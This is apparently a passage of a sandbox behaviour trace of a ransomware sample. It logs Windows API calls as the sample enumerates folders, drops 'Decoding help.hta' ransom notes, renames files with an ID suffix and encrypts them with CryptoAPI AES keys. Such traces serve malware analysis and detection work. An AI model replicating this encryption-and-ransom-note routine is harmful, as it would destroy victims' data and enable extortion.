ftLastAccessTime.dwLowDateTime=0xaf82f540, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac170580, ftLastWriteTime.dwHighDateTime=0x1ced1ec, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.ini", cAlternateFileName="")) returned 1 [0040.021] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" [0040.021] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned 58 [0040.021] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta" [0040.021] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\decoding help.hta")) returned 0x1 [0040.021] lstrcmpiW (lpString1="Decoding help.hta", lpString2="updater.ini") returned -1 [0040.021] lstrlenW (lpString="updater.ini") returned 11 [0040.021] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" [0040.021] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned 58 [0040.021] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\", lpString2="updater.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" [0040.021] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" [0040.021] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0040.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.027] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.027] CreateFileMappingA (hFile=0x184, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x228 [0040.028] CryptAcquireContextA (in: phProv=0x778fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x778fcec*=0x5b0220) returned 1 [0040.028] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0x778fce8 | out: phKey=0x778fce8*=0x5a5730) returned 1 [0040.028] CryptExportKey (in: hKey=0x5a5730, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x778fbe4, pdwDataLen=0x778fce4 | out: pbData=0x778fbe4*, pdwDataLen=0x778fce4*=0x2c) returned 1 [0040.028] MapViewOfFile (hFileMappingObject=0x228, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c0) returned 0x2d0000 [0040.033] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x100) returned 1 [0040.033] CryptEncrypt (in: hKey=0x5a5730, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x778fce4*=0x4c0, dwBufLen=0x4c0 | out: pbData=0x2d0000*, pdwDataLen=0x778fce4*=0x4c0) returned 1 [0040.033] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0040.034] CloseHandle (hObject=0x228) returned 1 [0040.034] CryptDestroyKey (hKey=0x5a5730) returned 1 [0040.034] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0040.034] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.034] WriteFile (in: hFile=0x184, lpBuffer=0x778fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x778fbe4*, lpNumberOfBytesWritten=0x778fcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.035] WriteFile (in: hFile=0x184, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x778fcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.035] CloseHandle (hObject=0x184) returned 1 [0040.036] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.036] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf82f540, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf82f540, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac170580, ftLastWriteTime.dwHighDateTime=0x1ced1ec, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.ini", cAlternateFileName="")) returned 0 [0040.036] FindClose (in: hFindFile=0x5a5570 | out: hFindFile=0x5a5570) returned 1 Thread: id = 73 os_tid = 0xb58 [0039.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*.*", lpFindFileData=0x78cfd30 | out: lpFindFileData=0x78cfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 74 os_tid = 0xb5c [0039.541] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\*.*", lpFindFileData=0x7a0fd30 | out: lpFindFileData=0x7a0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a54b0 [0039.544] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.544] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x7a0fd30 | out: lpFindFileData=0x7a0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.545] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.545] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.545] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x7a0fd30 | out: lpFindFileData=0x7a0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0039.545] lstrcmpW (lpString1=".", lpString2="Java") returned -1 [0039.545] lstrcmpW (lpString1="..", lpString2="Java") returned -1 [0039.545] lstrcmpiW (lpString1="windows", lpString2="Java") returned 1 [0039.545] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Sun\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\*.*") returned="\\\\?\\C:\\ProgramData\\Sun\\*.*" [0039.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\*.*") returned 26 [0039.545] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Sun\\", lpString2="Java" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java") returned="\\\\?\\C:\\ProgramData\\Sun\\Java" [0039.545] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\*.*") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\*.*" [0039.545] GlobalMemoryStatus (in: lpBuffer=0x7a0fd10 | out: lpBuffer=0x7a0fd10) [0039.545] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5dc88d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x184 [0039.554] CloseHandle (hObject=0x184) returned 1 [0039.554] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x7a0fd30 | out: lpFindFileData=0x7a0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0039.554] FindClose (in: hFindFile=0x5a54b0 | out: hFindFile=0x5a54b0) returned 1 Thread: id = 75 os_tid = 0xb60 [0039.544] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*.*", lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 76 os_tid = 0xb64 [0039.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*.*", lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5ff0 [0040.556] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.556] FindNextFileW (in: hFindFile=0x5a5ff0, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.556] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.556] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.556] FindNextFileW (in: hFindFile=0x5a5ff0, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0040.556] lstrcpyW (in: lpString1=0x5cf0528, lpString2="\\\\?\\C:\\Boot\\it-IT\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\*.*") returned="\\\\?\\C:\\Boot\\it-IT\\*.*" [0040.556] lstrlenW (lpString="\\\\?\\C:\\Boot\\it-IT\\*.*") returned 21 [0040.556] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\it-IT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\it-IT\\Decoding help.hta" [0040.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\Decoding help.hta" (normalized: "c:\\boot\\it-it\\decoding help.hta")) returned 0xffffffff [0040.557] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\Decoding help.hta" (normalized: "c:\\boot\\it-it\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.807] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3a8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3a8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.808] CloseHandle (hObject=0x33c) returned 1 [0040.808] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.268] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0041.268] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0041.268] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\it-IT\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\*.*") returned="\\\\?\\C:\\Boot\\it-IT\\*.*" [0041.268] lstrlenW (lpString="\\\\?\\C:\\Boot\\it-IT\\*.*") returned 21 [0041.269] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\it-IT\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" [0041.269] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" [0041.269] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.269] FindNextFileW (in: hFindFile=0x5a5ff0, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0041.269] FindClose (in: hFindFile=0x5a5ff0 | out: hFindFile=0x5a5ff0) returned 1 Thread: id = 77 os_tid = 0xb68 [0039.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*.*", lpFindFileData=0x7c8fd30 | out: lpFindFileData=0x7c8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7c90 [0040.569] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.569] FindNextFileW (in: hFindFile=0x5d7c90, lpFindFileData=0x7c8fd30 | out: lpFindFileData=0x7c8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.569] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.569] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.569] FindNextFileW (in: hFindFile=0x5d7c90, lpFindFileData=0x7c8fd30 | out: lpFindFileData=0x7c8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0040.569] lstrcpyW (in: lpString1=0x10960808, lpString2="\\\\?\\C:\\Boot\\ja-JP\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\*.*") returned="\\\\?\\C:\\Boot\\ja-JP\\*.*" [0040.569] lstrlenW (lpString="\\\\?\\C:\\Boot\\ja-JP\\*.*") returned 21 [0040.569] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ja-JP\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\ja-JP\\Decoding help.hta" [0040.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\Decoding help.hta" (normalized: "c:\\boot\\ja-jp\\decoding help.hta")) returned 0xffffffff [0040.569] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\Decoding help.hta" (normalized: "c:\\boot\\ja-jp\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.814] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x7c8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x7c8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.815] CloseHandle (hObject=0x33c) returned 1 [0040.815] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.273] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0041.273] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0041.273] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\ja-JP\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\*.*") returned="\\\\?\\C:\\Boot\\ja-JP\\*.*" [0041.273] lstrlenW (lpString="\\\\?\\C:\\Boot\\ja-JP\\*.*") returned 21 [0041.273] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ja-JP\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" [0041.273] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" [0041.273] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.273] FindNextFileW (in: hFindFile=0x5d7c90, lpFindFileData=0x7c8fd30 | out: lpFindFileData=0x7c8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0041.273] FindClose (in: hFindFile=0x5d7c90 | out: hFindFile=0x5d7c90) returned 1 Thread: id = 78 os_tid = 0xb6c [0039.565] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*.*", lpFindFileData=0x7dcfd30 | out: lpFindFileData=0x7dcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a6070 [0040.560] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.561] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0x7dcfd30 | out: lpFindFileData=0x7dcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.561] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.561] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.561] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0x7dcfd30 | out: lpFindFileData=0x7dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0040.561] lstrcpyW (in: lpString1=0x5d00538, lpString2="\\\\?\\C:\\Boot\\ko-KR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\*.*") returned="\\\\?\\C:\\Boot\\ko-KR\\*.*" [0040.561] lstrlenW (lpString="\\\\?\\C:\\Boot\\ko-KR\\*.*") returned 21 [0040.561] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ko-KR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\ko-KR\\Decoding help.hta" [0040.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\Decoding help.hta" (normalized: "c:\\boot\\ko-kr\\decoding help.hta")) returned 0xffffffff [0040.561] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\Decoding help.hta" (normalized: "c:\\boot\\ko-kr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.811] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x7dcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x7dcfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.811] CloseHandle (hObject=0x33c) returned 1 [0040.812] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\Decoding 